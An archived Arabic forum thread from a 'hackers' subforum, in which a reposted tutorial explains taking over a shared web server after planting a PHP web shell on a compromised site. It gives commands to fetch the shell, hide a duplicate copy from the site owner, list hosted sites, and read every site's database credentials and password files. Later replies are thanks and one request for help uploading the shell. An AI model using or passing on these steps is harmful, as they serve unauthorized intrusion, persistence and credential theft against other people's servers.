عالم حواء | الجوال | احسب وزنك | الصوتيات | الفيديو | تفسير احلام | مطبخ خولة | أزياء | بطاقات

   طريق حواء  

العاب | العاب سرعة وتركيز | العاب جديدة | العاب فلاش | العاب ورق | العاب أطفال | العاب اكشن | العاب سيارات

 
 

 

دليل موقع لك سيدتي : موقع اسلامي - موقع نسائي - موقع اخبار - موقع برامج - موقع رياضي - موقع شات - موقع العاب
 
عالم خوله > المنتديات التقنيه > منتدى الهكرز > طريقة اختراق السيرفر كاملا
 
اسم المستخدم كلمة المرور   هل تود التسجيل معنا ؟
الإنتساب في عالم خولة يمكنك من الحصول على كافة الإمتيازات والصلاحيات التي لا يتم تخصيصها إلا للأعضاء.
 

 

اشتركي في عالم خولة ليصلك كل جديد

البريد الإلكتروني:
زيارة هذه المجموعة

طريقة اختراق السيرفر كاملا

منتدى الهكرز

المشاركة في الموضوع
 
LinkBack خيارات الموضوع طريقة العرض
قديم 10-01-2005 *, 12:34   رقم المشاركة : 1
الكاتب

عضو أمتعنا بحروفه

الصورة الرمزية لـ شمس الحب

 


الملف الشخصي






غير متصل

شمس الحب is on a distinguished road


طريقة اختراق السيرفر كاملا


بسم الله الرحمن الرحيم
_____________________


طريقة اختراق السيرفرات ..

نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..

وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا

قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--

البي اتش بي شيل ((php****l )) هو سكربت بلغة (( php ))

وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..

ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ php****l
على موقعك او الموقع الذي اخترقته..

ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..

وللتوضيح اكثر..

نفترض انك اخترقت الموقع عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط وقمت بتحميل الــ php****l
على ملف download
فسيصبح العنوان عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط

وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ

في الفراغ هذا سوف نضع فيه اوامر اللينكس..

ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--

يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..

ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
لاخفاءه نسوي كذا بالطريقة هذي عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط wget
وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv php****l.php .php****l.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..

---------------------------------------------
ندخل الى موضوعنا

والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط

وثم نجد كتابة اسمها Command وامامها فراغ

في الفراغ هذا ندخل اوامر اللينكس عليه..

وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..

ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---==-- شرح الاوامر --==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات

نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))

1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له

اكتب هذا الامر
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..

طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط والمنتدى من نوعية phpBB

المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup

-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..

اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd

وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا

cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

وراح يجينا الباسورد للموقع ومشفر بمقياس DES

----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك

نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf

وراح يجينا الباسوردات لكل المواقع..

ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..

وفي النهاية اتمنى انكم استفدتو من الدرس المبسط عن الاختراق عبر الشيل
وللذين يريدون نقل الموضوع يجب عليهم ذكر المصدر + الحقوق .. وشكرا
*-*-**-**--*-*-*-*-*


منقووووووول
الله ** الوطن ** M










 
من مواضيعي في المنتدي

0 لماذا اخفى الله موعد الموت ؟؟؟
0 شخصيتك من خلال شعرك
0 أول ... مرة
0 حكم الاحتفال بالمولد
0 الرسالة الغامضة
0 احاسيس ماطره
0 ماذنبُ هذا الشعر إلاّ أنتـــمُ !
0 طبخة مندي حلووووووووووة جربوها وشوفوا
0 موقع راااائع....يعلمك 11 لغـــه
0 وش رايكم بالموقف هذا
0 مصلحة الفتاة اين ؟؟؟ اكمال الدراسة ام الزواج
0 فضل حفظ القرآن الكريم
0 المدرس والمدارس والدراسه
0 شارك في الدفاع عن رسول الله ( هام جدا للجميع
0 صعب البكا يكذب

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
الرد مع إقتباس
 

 
قديم 10-03-2005 *, 12:27   رقم المشاركة : 4
الكاتب

عضو مشارك

 


الملف الشخصي






غير متصل

(العميد) is on a distinguished road


ههههههههههههههه مرسي على الدمار العام.










 
من مواضيعي في المنتدي

0 الإدارة تجيب...
0 عضو جديد في إنتظار المذهله.

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
الرد مع إقتباس
قديم 05-08-2007 *, 12:56   رقم المشاركة : 6
الكاتب

عضو يا هلا فيه

 


الملف الشخصي






غير متصل

RomanTic_B4 is on a distinguished road


ازاي ارفع الشيل على الموقع


وثانيا الملف بتاع php****l اعمل فيه ايه

يا ريت الرد ضروري

اعمل ايه










 
من مواضيعي في المنتدي

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
الرد مع إقتباس
قديم 28-03-2008 *, 11:43   رقم المشاركة : 7
الكاتب

عضو يا هلا فيه

 


الملف الشخصي






غير متصل

saud1122 is on a distinguished road


بارك الله فيك










 
من مواضيعي في المنتدي

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
الرد مع إقتباس
قديم 01-04-2008 *, 11:58   رقم المشاركة : 8
الكاتب

عضو يا هلا فيه

 


الملف الشخصي






غير متصل

arb4voice is on a distinguished road


مشكووور وبرنامج رائع جدا










 
من مواضيعي في المنتدي

0 عرب فور فويس لخدمات وتركيب الشات الصوتي والكتابي+خدمة تاجير السيرفيرات والريسليرات

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
الرد مع إقتباس
قديم 06-04-2008 *, 03:01   رقم المشاركة : 9
الكاتب

عضو يا هلا فيه

 


الملف الشخصي






غير متصل

طيهو is on a distinguished road


شكر


يسلموووووووووووو










 
من مواضيعي في المنتدي

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
الرد مع إقتباس
قديم 18-04-2008 *, 03:32   رقم المشاركة : 10
الكاتب

عضو يا هلا فيه

 


الملف الشخصي






غير متصل

حفراوي عنيد is on a distinguished road


مشكوووووووووور يعطيك العافيه










 
من مواضيعي في المنتدي

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
الرد مع إقتباس
قديم 18-04-2008 *, 03:37   رقم المشاركة : 11
الكاتب

عضو يا هلا فيه

 


الملف الشخصي






غير متصل

حفراوي عنيد is on a distinguished road


شكرىآ آخويي على هالموضووووووووووووووووووووووووووووووووووووووع










 
من مواضيعي في المنتدي

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
الرد مع إقتباس
قديم 27-04-2008 *, 02:37   رقم المشاركة : 12
الكاتب

عضو يا هلا فيه

 


الملف الشخصي






غير متصل

nar_ihab_nar is on a distinguished road


شكراااااااااااااااااااااااااااااااااا










 
من مواضيعي في المنتدي

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
الرد مع إقتباس
قديم 10-05-2008 *, 02:14   رقم المشاركة : 13
الكاتب

عضو يا هلا فيه

 


الملف الشخصي